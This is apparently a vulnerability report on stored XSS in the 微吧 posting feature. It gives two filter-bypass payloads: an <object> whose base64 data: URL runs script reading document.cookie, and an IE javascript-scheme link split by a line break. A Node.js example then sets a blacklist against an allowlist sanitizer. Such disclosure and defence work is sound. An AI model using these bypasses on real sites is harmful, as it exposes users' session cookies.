### Brief description:
Insufficient filtering leads to XSS; the latest version was tested and the XSS fires.
### Details:
POC:
Create a post in 微吧 with the following content:
```
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+"></object>xss
```
`PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+` is the base64 encoding of `<script>alert(document.cookie)</script>`. Wrapping it in a `data:` URL means the post never contains a literal `<script>` tag or the string `javascript:`, so a filter that only looks for those tokens lets the `<object>` through and the browser loads the decoded HTML.
Firefox:
![1.jpg](https://images.seebug.org/upload/201404/160133423384983e3f23e0b948e8bf8f4af38367.jpg)
Also attached, a bypass for IE:
The code filters `javascript:`, but in IE this can be bypassed by inserting a carriage return inside the scheme: the filter looks for the literal string `javascript:` and never matches `javascript\r\n:`, while IE strips the line break when parsing the URL and still treats it as a `javascript:` URL. The screenshot below shows the fragment that filters sensitive characters:
![3.jpg](https://images.seebug.org/upload/201404/16014409fa4d22abd122a82db42d49589326570b.jpg)
The following statement bypasses it. It cannot be typed directly into the post body, where it would be escaped; send the request with a tool such as Burp. The `\u006f` escapes are valid JavaScript identifier escapes, so `d\u006fcument.c\u006fokie` evaluates to `document.cookie` while a keyword filter on that string does not match:
```
<a href='javascript
:alert(d\u006fcument.c\u006fokie)'>test</a>
```
Result:
![4.jpg](https://images.seebug.org/upload/201404/16030249ae85b31306d7ac6801ee75b9f60ac71c.jpg)
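Both payloads exploit the same root cause: the filter is a string blacklist applied to the raw post text, whereas the browser decodes HTML entities and strips tab/CR/LF from a URL before it ever looks at the scheme, so the filter and the browser disagree about what the attribute contains. The following is an added example, not code from this report or from 微吧, that puts that blacklist next to a scheme-allowlist sanitizer and runs both against the report's two payloads. It also checks entity-encoded and tab-separated variants of the `javascript:` scheme, which the same normalisation catches and which go beyond what the report tested. It assumes Node.js; every function and constant name is illustrative.

```javascript
// Added example: not code from the original report or from 微吧. Contrasts the
// keyword blacklist the report describes with an allowlist sanitizer that
// normalises attribute values the way browsers do before checking the scheme.
// Node.js, no dependencies. All names are illustrative.

// Constructed copies of the two payloads from the report. "\\u006f" puts a
// literal backslash-u into the HTML, and the break after "javascript" is a
// CR LF as produced by pressing Enter in a raw request.
const DATA_URL = "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+";
const OBJECT_PAYLOAD = '<object data="' + DATA_URL + '"></object>xss';
const IE_PAYLOAD = "<a href='javascript\r\n:alert(d\\u006fcument.c\\u006fokie)'>test</a>";

// 1. The blacklist the report bypasses: "javascript\r\n:" does not contain the
//    token, so nothing is removed, and the data: URL is not even considered.
function naiveFilter(html) {
  return html.replace(/javascript:/gi, "");
}

// 2. Decode a data: URL to see what the <object> actually loads.
function decodeDataUrl(url) {
  const m = /^data:([^,;]*)(;base64)?,(.*)$/s.exec(normalizeUrl(url));
  if (!m) throw new Error("not a data: URL");
  const body = m[2] ? Buffer.from(m[3], "base64").toString("utf8") : decodeURIComponent(m[3]);
  return { mime: m[1] || "text/plain", body };
}

// 3. Normalise like a browser: attribute values are entity-decoded at parse
//    time, then the URL parser removes ASCII tab/LF/CR anywhere and trims C0
//    controls and spaces at both ends (WHATWG URL). A check on the raw text
//    instead sees "javascript\r\n:" or "&#106;avascript:" as harmless.
const NAMED_ENTITIES = { amp: "&", lt: "<", gt: ">", quot: '"', colon: ":", Tab: "\t", NewLine: "\n" };
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === "#") {
      const cp = /^#x/i.test(body) ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return cp >= 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    return NAMED_ENTITIES[body] ?? match;
  });
}
function normalizeUrl(value) {
  return decodeEntities(value).replace(/[\t\n\r]/g, "").replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
}

// 4. Allowlist the scheme instead of blacklisting strings. Relative URLs have
//    no scheme and are allowed; any leftover control character is rejected.
const SAFE_SCHEMES = new Set(["http", "https", "mailto"]);
function isSafeUrl(value) {
  const url = normalizeUrl(value);
  if (/[\x00-\x1f]/.test(url)) return false;
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? SAFE_SCHEMES.has(m[1].toLowerCase()) : true;
}

// 5. Tag and attribute allowlist: <object>, <script>, <iframe> and the like are
//    dropped outright, on* handlers are never kept, URL attributes must pass
//    isSafeUrl. The regex tag walker is only illustrative; production code
//    should use a real sanitizer (e.g. DOMPurify) that parses like the browser.
const ALLOWED_TAGS = new Set(["a", "b", "i", "p", "br", "img"]);
const URL_ATTRS = new Set(["href", "src"]);
const ATTR_RE = /([a-z][a-z0-9-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
function sanitize(html) {
  return html.replace(/<\/?([a-z][a-z0-9-]*)([^>]*)>/gi, (tag, name, attrs) => {
    name = name.toLowerCase();
    if (!ALLOWED_TAGS.has(name)) return "";
    if (tag.startsWith("</")) return `</${name}>`;
    const kept = [];
    for (const a of attrs.matchAll(ATTR_RE)) {
      const key = a[1].toLowerCase();
      const val = a[2] ?? a[3] ?? a[4] ?? "";
      if (key.startsWith("on")) continue;
      if (URL_ATTRS.has(key) && !isSafeUrl(val)) continue;
      kept.push(`${key}="${val.replace(/"/g, "&quot;")}"`);
    }
    return `<${name}${kept.length ? " " + kept.join(" ") : ""}>`;
  });
}

// Run the report's payloads through both filters.
function demo() {
  return {
    objectLoads: decodeDataUrl(DATA_URL).body,          // the <script> the <object> renders
    naiveKeepsIePayload: naiveFilter(IE_PAYLOAD) === IE_PAYLOAD,
    naiveKeepsObjectPayload: naiveFilter(OBJECT_PAYLOAD) === OBJECT_PAYLOAD,
    sanitizedObject: sanitize(OBJECT_PAYLOAD),            // only the trailing text survives
    sanitizedIe: sanitize(IE_PAYLOAD),                    // <a> kept, href dropped
  };
}
console.log(demo());
```

The point of `isSafeUrl` is that it never asks "does this contain `javascript:`"; it asks "after the browser's own normalisation, what is the scheme, and is it on my list". That makes the CR/LF trick, the `&#106;` entity trick and the `data:` URL all fail for the same reason, and the `\u006f` identifier escapes in the payload become irrelevant because the script body is never reached.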
### Proof of vulnerability:
When a user views the post, the XSS fires.
Firefox: see 1.jpg above. IE: see 4.jpg above.